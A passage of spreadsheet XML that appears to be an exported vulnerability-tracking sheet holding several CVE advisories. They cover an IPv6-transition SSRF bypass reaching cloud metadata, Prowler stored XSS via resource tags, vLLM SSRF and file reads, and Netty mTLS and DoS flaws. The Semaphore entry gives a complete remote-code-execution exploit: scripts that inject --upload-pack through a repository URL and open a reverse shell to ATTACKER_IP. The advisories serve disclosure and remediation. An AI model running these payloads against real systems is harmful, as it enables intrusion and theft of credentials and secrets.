- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="T1588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="1589"><c r="A1589" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1589" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D1589" s="5" t="inlineStr" /><c r="E1589" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1589" s="5" t="inlineStr" /><c r="H1589" s="5" t="n"><v>0.002</v></c><c r="I1589" s="5" t="inlineStr" /><c r="J1589" s="5" t="inlineStr" /><c r="K1589" s="5" t="inlineStr" /><c r="L1589" s="5" t="inlineStr"><is><t>PyPI:prowler, PyPI:prowler-cloud</t></is></c><c r="M1589" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1589" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1589" s="5" t="inlineStr" /><c r="R1589" s="5" t="inlineStr" /><c r="S1589" s="5" t="inlineStr"><is><t>## Summary

Prowler's HTML output formatter inserts `finding.resource_tags` into the generated report without HTML escaping. A cloud principal who can create or edit a resource tag in an account that is later scanned can store HTML or JavaScript in that tag. When another user opens the generated Prowler HTML report, the payload executes in the report page.

## Impact

This is stored cross-site scripting in a security report artifact. The attacker needs permission to influence tags on a scanned cloud resource, and the victim must open the generated HTML report. In that context, JavaScript can read and modify the report DOM, alter displayed findings, and interact with any same-origin local or hosted report content available to the browser. This can undermine trust in generated security findings and can expose data contained in the report page.

## Gate checks

The repository has 13,875 GitHub stars, which is above the 10,000 star floor. `SECURITY.md` is present and does not reject GitHub private reporting. The dedicated GitHub private vulnerability reporting endpoint for `prowler-cloud/prowler` returned `true`.

## Affected versions

The vulnerable sink is present in current `master` at commit `329dfdf8e6cb8bc0424fb54b6595408e20969782` and in the latest GitHub release tag `5.28.0`. The package metadata identifies the Python package as `prowler`.

## Technical details

The HTML formatter builds each finding row with an f-string in `prowler/lib/outputs/html/html.py`. Neighboring fields are explicitly escaped:

- `resource_uid` is escaped at line 85 with `.replace("&lt;", "&amp;lt;").replace("&gt;", "&amp;gt;")`.
- `status_extended` is escaped at line 87 with the same pattern.

The tag column does not apply equivalent escaping:

```python
&lt;td&gt;{parse_html_string(unroll_dict(finding.resource_tags))}&lt;/td&gt;
```

`unroll_dict` concatenates tag keys and values into a string, and `parse_html_string` only prefixes each item with an HTML bullet. Neither function escapes `&lt;`, `&gt;`, quotes, or event-handler attributes before insertion into the table cell. As a result, a tag value such as this remains active markup in the generated report:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

## Reproduction

1. Create or identify a cloud resource that Prowler will include in an HTML report.
2. Add a tag value containing a harmless proof payload, for example:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

3. Run Prowler against the account and generate HTML output.
4. Open the generated HTML report in a browser.
5. The payload executes from the tags column.

A proof HTML fragment using the same formatter structure set `window.PROWLER_TAG_XSS=1` from `resource_tags`, while equivalent payloads in `resource_uid` and `status_extended` stayed text because those fields are escaped.

Local evidence:

- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-evidence-2026-05-26.json`
- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-proof-full.html`

## PoC

The minimized generated row below mirrors the vulnerable formatter output. The first and third candidate payloads are escaped controls. The middle payload is the unescaped `resource_tags` value and executes when the report is rendered.

```html
&lt;tr class="table-danger"&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_UID_XSS=1"&amp;gt;&lt;/td&gt;
  &lt;td&gt;
    &amp;#x2022;Owner=&lt;img src=x onerror="window.PROWLER_TAG_XSS=1;document.body.setAttribute('data-prowler-tag-xss','1')"&gt;
  &lt;/td&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_STATUS_XSS=1"&amp;gt;&lt;/td&gt;
&lt;/tr&gt;
```

Browser proof result from the local artifact:

```json
{"tag": 1, "uid": 0, "status": 0, "attr": "1"}
```

## Remediation

Escape tag keys and values before inserting them into HTML output. Prefer a single HTML escaping helper for every finding field that can originate from provider data. If bullets or separators are needed, build the list structure after escaping each key and value, rather than escaping the final HTML string after markup has been added.</t></is></c><c r="T1589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="1590"><c r="A1590" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1590" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D1590" s="5" t="inlineStr" /><c r="E1590" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1590" s="5" t="inlineStr" /><c r="H1590" s="5" t="n"><v>0.006</v></c><c r="I1590" s="5" t="inlineStr" /><c r="J1590" s="5" t="inlineStr" /><c r="K1590" s="5" t="inlineStr" /><c r="L1590" s="5" t="inlineStr"><is><t>Go:github.com/semaphoreui/semaphore</t></is></c><c r="M1590" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1590" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1590" s="5" t="inlineStr" /><c r="R1590" s="5" t="inlineStr" /><c r="S1590" s="5" t="inlineStr"><is><t># Summary
An OS command injection in repository git_url handling lets any user holding the Manager or Owner role on any project (the normal project-collaborator roles) achieve remote code execution on the Semaphore server host. Using git's --upload-pack=&lt;cmd&gt; option, an attacker runs arbitrary commands. The command executes inside the main Semaphore server process (via the schedule commit-hash poller), so it runs even when jobs are configured for remote runners — bypassing runner isolation and exposing the master encryption key and every project's secrets. Reproducible on a default install (git_client: cmd_git); no non-default configuration is required.

# Details
The repository git_url is attacker-controlled (HTTP body) and reaches exec.Command("git", ...) unvalidated. Two missing controls cause this:

1. git_url is never validated against option injection.
Repository.Validate() (db/Repository.go, ~lines 138–156) validates the branch via ValidateGitBranch (db/git_branch.go, which rejects a leading -), but performs no equivalent check on GitURL (only "non-empty"). ValidateRepository (db/Store.go, ~802–806) only checks the SSH key. CreateRepository (db/sql/repository.go, ~76–95) stores it verbatim. Because --upload-pack=... has no scheme:// and no leading /, GetType() (db/Repository.go, ~113–136) classifies it as RepositorySSH and GetGitURL(false) (~72–111) returns it raw/unchanged.

2. The git command is built with no -- separator.
CmdGitClient.GetLastRemoteCommitHash (db_lib/CmdGitClient.go, ~169–185) calls:
c.output(r, GitRepositoryTmpPath, "ls-remote",
           r.Repository.GetGitURL(false),   // attacker-controlled
           r.Repository.GitBranch)          // "master"
output (~79–93) → makeCmd (~21–60): exec.Command("git") (line ~27), cmd.Args = append(cmd.Args, args...) (line ~55). The resulting argv has no --:
["git", "ls-remote", "--upload-pack=&lt;cmd&gt;;true", "master"]
git parses --upload-pack=... as an option; master becomes the (local-transport) repository operand; git then executes the upload-pack value through a shell (sh -c "&lt;cmd&gt; 'master'"), running &lt;cmd&gt;. This is intended git behavior — the fault is Semaphore passing untrusted data as argv. (The command runs even though git subsequently prints fatal: Could not read from remote repository and exits 128, and even though master is not a real path.)

### Trigger — it fires in the server process.
A project schedule with a repository_id causes the scheduler to run git ls-remote to check for new commits. AddSchedule (api/projects/schedules.go, ~130–160; validateSchedulePayload ~86–118 validates only the cron format — it does not require the repo to be tied to the template). The schedule pool is started in the server process: runService in cli/cmd/root.go (CreateSchedulePool ~line 115, go schedulePool.Run() ~line 193), independent of remote-runner config. On each tick, ScheduleRunner.Run (services/schedules/SchedulePool.go, ~96–193, line ~117) calls tryUpdateScheduleCommitHash (~61–94) — before the HA de-dup lock (~145) — which loads the repo by repository_id and calls GetLastRemoteCommitHash(). Refresh (~265–358, line 287) registers such schedules even when inactive, so deactivating does not stop it.

### Entry points:
POST /api/project/{id}/repositories (api/projects/repository.go:AddRepository, ~101–137) stores the payload; POST /api/project/{id}/schedules arms it. Both are gated by GetMustCanMiddleware(db.CanManageProjectResources) (api/router.go ~294/310/327), a permission held by ProjectManager/ProjectOwner (db/ProjectUser.go, ~22–27).

# PoC
Environment: the official semaphore v2.18.12 binary; git, python3, nc present. This PoC uses the default git client and non_admin_can_create_project: false; the attacker lowpriv is onboarded by the admin as a normal Manager (no special configuration).

### Terminal 1 — config + users + server
```
  cd ~/PoC &amp;&amp; mkdir -p tmp
  cat &gt; config.json &lt;&lt;EOF
  { "sqlite":{"host":"$PWD/database.sqlite"},"dialect":"sqlite","tmp_path":"$PWD/tmp",
    "port":":3000","interface":"127.0.0.1",
    "cookie_hash":"$(head -c32 /dev/urandom|base64)","cookie_encryption":"$(head -c32 /dev/urandom|base64)",
    "access_key_encryption":"$(head -c32 /dev/urandom|base64)","git_client":"cmd_git",
    "non_admin_can_create_project":false,"web_host":"http://127.0.0.1:3000/" }
  EOF
  ./semaphore user add --admin --login admin  --name Admin --email admin@example.com --password 'Admin123!'  --config config.json
  ./semaphore user add        --login lowpriv --name Low   --email low@example.com   --password 'LowPriv123!' --config config.json
  ./semaphore server --config config.json
```
### Terminal 2 — attacker listener
```
  nc -lvnp 4444
```
### Terminal 3 — admin onboards lowpriv as Manager, then lowpriv exploits
```
  cd ~/PoC

  cat &gt; onboard.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"
  ADMIN="${ADMIN:-admin}"; ADMIN_PASS="${ADMIN_PASS:-Admin123!}"; MEMBER="${MEMBER:-lowpriv}"
  JAR=$(mktemp)
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$ADMIN\",\"password\":\"$ADMIN_PASS\"}" &gt;/dev/null
  PROJ_PID=$(curl -s -b "$JAR" -X POST "$BASE/api/projects" -H 'Content-Type: application/json' \
    -d '{"name":"team-project","alert":false}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
  USER_ID=$(curl -s -b "$JAR" "$BASE/api/users" | \
    python3 -c "import sys,json;print(next(u['id'] for u in json.load(sys.stdin) if u['username']=='$MEMBER'))")
  curl -s -b "$JAR" -X POST "$BASE/api/project/$PROJ_PID/users" -H 'Content-Type: application/json' \
    -d "{\"user_id\":$USER_ID,\"role\":\"manager\"}" -o /dev/null
  rm -f "$JAR"; echo "[*] $MEMBER is Manager of project $PROJ_PID" &gt;&amp;2; echo "$PROJ_PID"
  EOF
  chmod +x onboard.sh

  cat &gt; rce.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"; LOGIN="${LOGIN:-lowpriv}"; PASS="${PASS:-LowPriv123!}"
  PROJ_PID="${PROJ_PID:?set PROJ_PID from onboard.sh}"
  CMD="$*"; B64=$(printf '%s' "$CMD" | base64 -w0)
  GITURL="--upload-pack=bash -c \"echo $B64 | base64 -d | bash\";true"
  JAR=$(mktemp); jid(){ python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])'; }
  post(){ curl -s -b "$JAR" -X POST "$BASE$1" -H 'Content-Type: application/json' -d "$2"; }
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$LOGIN\",\"password\":\"$PASS\"}" &gt;/dev/null
  KID=$(post /api/project/$PROJ_PID/keys "{\"name\":\"k\",\"type\":\"none\",\"project_id\":$PROJ_PID}" | jid)
  BODY=$(python3 -c "import json,sys;print(json.dumps({'name':'r','project_id':$PROJ_PID,'git_url':sys.argv[1],'git_branch':'master','ssh_key_id':$KID}))" "$GITURL")
  RID=$(post /api/project/$PROJ_PID/repositories "$BODY" | jid)
  TID=$(post /api/project/$PROJ_PID/templates "{\"name\":\"t\",\"project_id\":$PROJ_PID,\"app\":\"bash\",\"playbook\":\"n.sh\",\"repository_id\":$RID,\"type\":\"\"}" | jid)
  post /api/project/$PROJ_PID/schedules "{\"name\":\"s\",\"project_id\":$PROJ_PID,\"template_id\":$TID,\"repository_id\":$RID,\"cron_format\":\"* * * * *\"}" &gt;/dev/null
  rm -f "$JAR"; echo "[*] queued as lowpriv (Manager of $PROJ_PID): $CMD"
  EOF
  chmod +x rce.sh

  PROJ_PID=$(./onboard.sh)
  ATTACKER_IP=127.0.0.1
  PROJ_PID=$PROJ_PID ./rce.sh "bash -i &gt;&amp; /dev/tcp/$ATTACKER_IP/4444 0&gt;&amp;1"
```

Within ~60 s the schedule fires and the Semaphore server process connects back to the listener (Terminal 2), giving an interactive shell as the server user. Verify with id and cat ~/PoC/config.json (the server can read its own access_key_encryption master key).

# Impact
- Type: OS command injection via argument injection — remote code execution.
- Who is impacted: any Semaphore deployment running the default git_client: cmd_git. The attacker only needs an authenticated account holding the Manager or Owner role on any project — the standard collaborator roles. (If non_admin_can_create_project is enabled, literally any authenticated user qualifies, since they can self-create a project and become its Owner. Global admins always qualify.)</t></is></c><c r="T1590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="1591"><c r="A1591" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1591" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D1591" s="5" t="inlineStr" /><c r="E1591" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1591" s="5" t="inlineStr" /><c r="H1591" s="5" t="n"><v>0.003</v></c><c r="I1591" s="5" t="inlineStr" /><c r="J1591" s="5" t="inlineStr" /><c r="K1591" s="5" t="inlineStr" /><c r="L1591" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1591" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1591" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1591" s="5" t="inlineStr" /><c r="R1591" s="5" t="inlineStr" /><c r="S1591" s="5" t="inlineStr"><is><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trigger.
### PoC
We reproduced the issue using meta-llama/Llama-3.2-1B-Instruct, for which d = 8192.

Using the following configuration:

Batch size: 17
Sequence length: 16384

The final response in the batch becomes an exact copy of the first response in the batch, demonstrating complete cross-user data leakage.

### Impact
This vulnerability enables cross-user information disclosure. An attacker can intentionally craft requests that are processed within the same inference batch as a victim's request and cause the victim's inference output to be copied into the attacker's response.

As a result, sensitive information contained in another user's model response may be exposed to an unauthorized party.

### Versions

For versions prior and equal to 0.21.0, the bug is in csrc/activation_kernels.cu, and for versions later than 0.21.0, the bug is in csrc/libtorch_stable/activation_kernels.cu.</t></is></c><c r="T1591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="1592"><c r="A1592" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1592" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D1592" s="5" t="inlineStr" /><c r="E1592" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1592" s="5" t="inlineStr" /><c r="H1592" s="5" t="n"><v>0.003</v></c><c r="I1592" s="5" t="inlineStr" /><c r="J1592" s="5" t="inlineStr" /><c r="K1592" s="5" t="inlineStr" /><c r="L1592" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1592" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1592" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1592" s="5" t="inlineStr" /><c r="R1592" s="5" t="inlineStr" /><c r="S1592" s="5" t="inlineStr"><is><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lines 231–249):**

```python
def _fetch_image(src: Any) -&gt; Image.Image:
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        if src.startswith(("http://", "https://")):
            r = requests.get(src, timeout=30)              # SSRF: no allowlist, follows redirects
            r.raise_for_status()
            return _to_rgb(copy.deepcopy(Image.open(BytesIO(r.content))))
        if src.startswith("file://"):
            return _to_rgb(Image.open(src[7:]))            # arbitrary local file read
        if src.startswith("data:image"):
            ...
        return _to_rgb(Image.open(src))                    # fallback also opens local files
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

**Sink 2 — audio SSRF (around line 471):**

```python
elif audio.startswith(("http://", "https://")):
    r = requests.get(audio, timeout=30)                    # SSRF: same pattern
    r.raise_for_status()
    file_obj = io.BytesIO(r.content)
```

**Reachability.** `_fetch_image` is invoked from `MiMoVLProcessor.process_image`:

```python
def process_image(self, image: ImageInput) -&gt; torch.Tensor:
    kw = self._resolve_img_kw(image)
    src = image.image
    if isinstance(src, (str, bytes)):
        src = _fetch_image(src)
    ...
```

`MiMoVLProcessor` is wrapped by `MiMoV2OmniMultiModalProcessor` and registered for the `MiMoV2OmniForCausalLM` model architecture (`vllm/model_executor/models/mimo_v2_omni.py:1169`). Whenever a user passes a string into `multi_modal_data["image"]` (or `["audio"]`) for this model, the unsanitized URL/path reaches the sink.

**Comparison to the recent fixes.** The remediation pattern adopted in the three earlier advisories was to route every external resource fetch through `MediaConnector`, which checks `allowed_local_media_path` and applies SSRF protection before issuing the network request. `chat_utils.py` (lines 838, 902, 924, 963, 1053, 1081) already uses `self._connector.fetch_image / fetch_audio / fetch_video`. The model processor in `mimo_v2_omni.py` was added later and skipped the connector — it calls `requests.get` and `Image.open` directly. Result: the public OpenAI chat-completion path is protected, but library use (`LLM.generate(multi_modal_data=...)`), batch processing, and any other path that lets a string reach the processor receive no protection.

### Impact

1. **SSRF — internal-network probing / cloud-metadata theft.** Standard `requests.get` follows redirects and accepts any URL. An attacker who controls a `multi_modal_data` value can:
   - read AWS / GCP / Azure instance metadata (e.g. `http://169.254.169.254/latest/meta-data/iam/security-credentials/`),
   - probe internal services on the vLLM host (`http://127.0.0.1:&lt;port&gt;`, `http://10.x.y.z`),
   - exfiltrate via DNS / HTTP timing oracles even when the body is rejected by `Image.open`.
2. **Arbitrary local file read** via `file://path` (line 242) and the unguarded fallback `Image.open(src)` (line 248). Any file readable by the vLLM process is reachable through the model pipeline; with suitable formats this exposes `/etc/passwd`, `~/.aws/credentials`, etc.
3. **Server-side traffic generation / amplification** by hammering arbitrary URLs from the vLLM host, with a 30-second timeout per request.

### Suggested remediation

Replace direct `requests.get` and bare `Image.open` paths with `MediaConnector.fetch_image` / `fetch_audio_async` (or pass the inputs through `MediaConnector` before they reach the processor):

```python
# vllm/transformers_utils/processors/mimo_v2_omni.py
from vllm.multimodal.utils import MediaConnector

_connector = MediaConnector()

def _fetch_image(src):
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        return _to_rgb(_connector.fetch_image(src))   # delegates to the hardened path
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

Same change for the audio loader at line 471. This re-uses the SSRF allowlist, `allowed_local_media_path` policy, and size caps that the previous patches added.

Alternative: forbid `str` `src` from reaching the processor and require all multi-modal pre-processing to go through `chat_utils.py` / `MediaConnector` before hitting the model. Larger surface change, but completes the architectural fix.

### Discovery

Static review on `vllm@main` (HEAD as of 2026-04-30) — found by triaging the file list against the three recent SSRF advisories: the `mimo_v2_omni.py` processor, added after those fixes, reintroduced the same bypass class.

### Reporter

Ievgen Bondarenko — `sactransport2000@gmail.com` — GitHub `@ibondarenko1`</t></is></c><c r="T1592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="1593"><c r="A1593" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1593" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D1593" s="5" t="inlineStr" /><c r="E1593" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1593" s="5" t="inlineStr" /><c r="H1593" s="5" t="n"><v>0.003</v></c><c r="I1593" s="5" t="inlineStr" /><c r="J1593" s="5" t="inlineStr" /><c r="K1593" s="5" t="inlineStr" /><c r="L1593" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1593" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1593" s="5" t="inlineStr" /><c r="R1593" s="5" t="inlineStr" /><c r="S1593" s="5" t="inlineStr"><is><t>### Summary
A fragmented TLS ClientHello whose handshake header spans multiple records makes Netty silently fall back to the default SslContext; where per-SNI selection is the sole mTLS gate, an unauthenticated attacker can bypass the route's mTLS requirement.

### Details
In `io.netty.handler.ssl.SslClientHelloHandler#decode` the guard that should wait for the 4-byte handshake header checks the wrong offset - it ignores the 5-byte record header that precedes it - and therefore never fires:

```java
if (handshakeLength == -1) {
    if (readerIndex + 4 &gt; endOffset) {
        // Need more data to read HandshakeType and handshakeLength (4 bytes)
        return;
    }
```

When the first record's payload is &lt; 4 bytes, `handshakeLength = in.getUnsignedMedium(readerIndex + SslUtils.SSL_RECORD_HEADER_LENGTH + 1);` leads to `IndexOutOfBoundsException `. That is caught by the generic `catch (Exception)` block, which calls `select(ctx, null)` - this is the default `SslContext`. Fallback to default on parse failure is a problem when per-SNI selection is the sole mTLS gate.

### Impact
SNI routing bypass. Escalates to an unauthenticated mTLS bypass only when:
- mTLS is enforced solely via per-SNI SslContext (clientAuth=REQUIRE)
- the default/fallback SslContext is permissive (clientAuth=NONE/OPTIONAL)
- no secondary peer-certificate verification exists at the application layer.</t></is></c><c r="T1593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="1594"><c r="A1594" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1594" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D1594" s="5" t="inlineStr" /><c r="E1594" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1594" s="5" t="inlineStr" /><c r="H1594" s="5" t="n"><v>0.004</v></c><c r="I1594" s="5" t="inlineStr" /><c r="J1594" s="5" t="inlineStr" /><c r="K1594" s="5" t="inlineStr" /><c r="L1594" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1594" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1594" s="5" t="inlineStr" /><c r="R1594" s="5" t="inlineStr" /><c r="S1594" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="T1594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="1595"><c r="A1595" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1595" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D1595" s="5" t="inlineStr" /><c r="E1595" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1595" s="5" t="inlineStr" /><c r="H1595" s="5" t="n"><v>0.025</v></c><c r="I1595" s="5" t="inlineStr" /><c r="J1595" s="5" t="inlineStr" /><c r="K1595" s="5" t="inlineStr" /><c r="L1595" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1595" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1595" s="5" t="inlineStr" /><c r="R1595" s="5" t="inlineStr" /><c r="S1595" s="5" 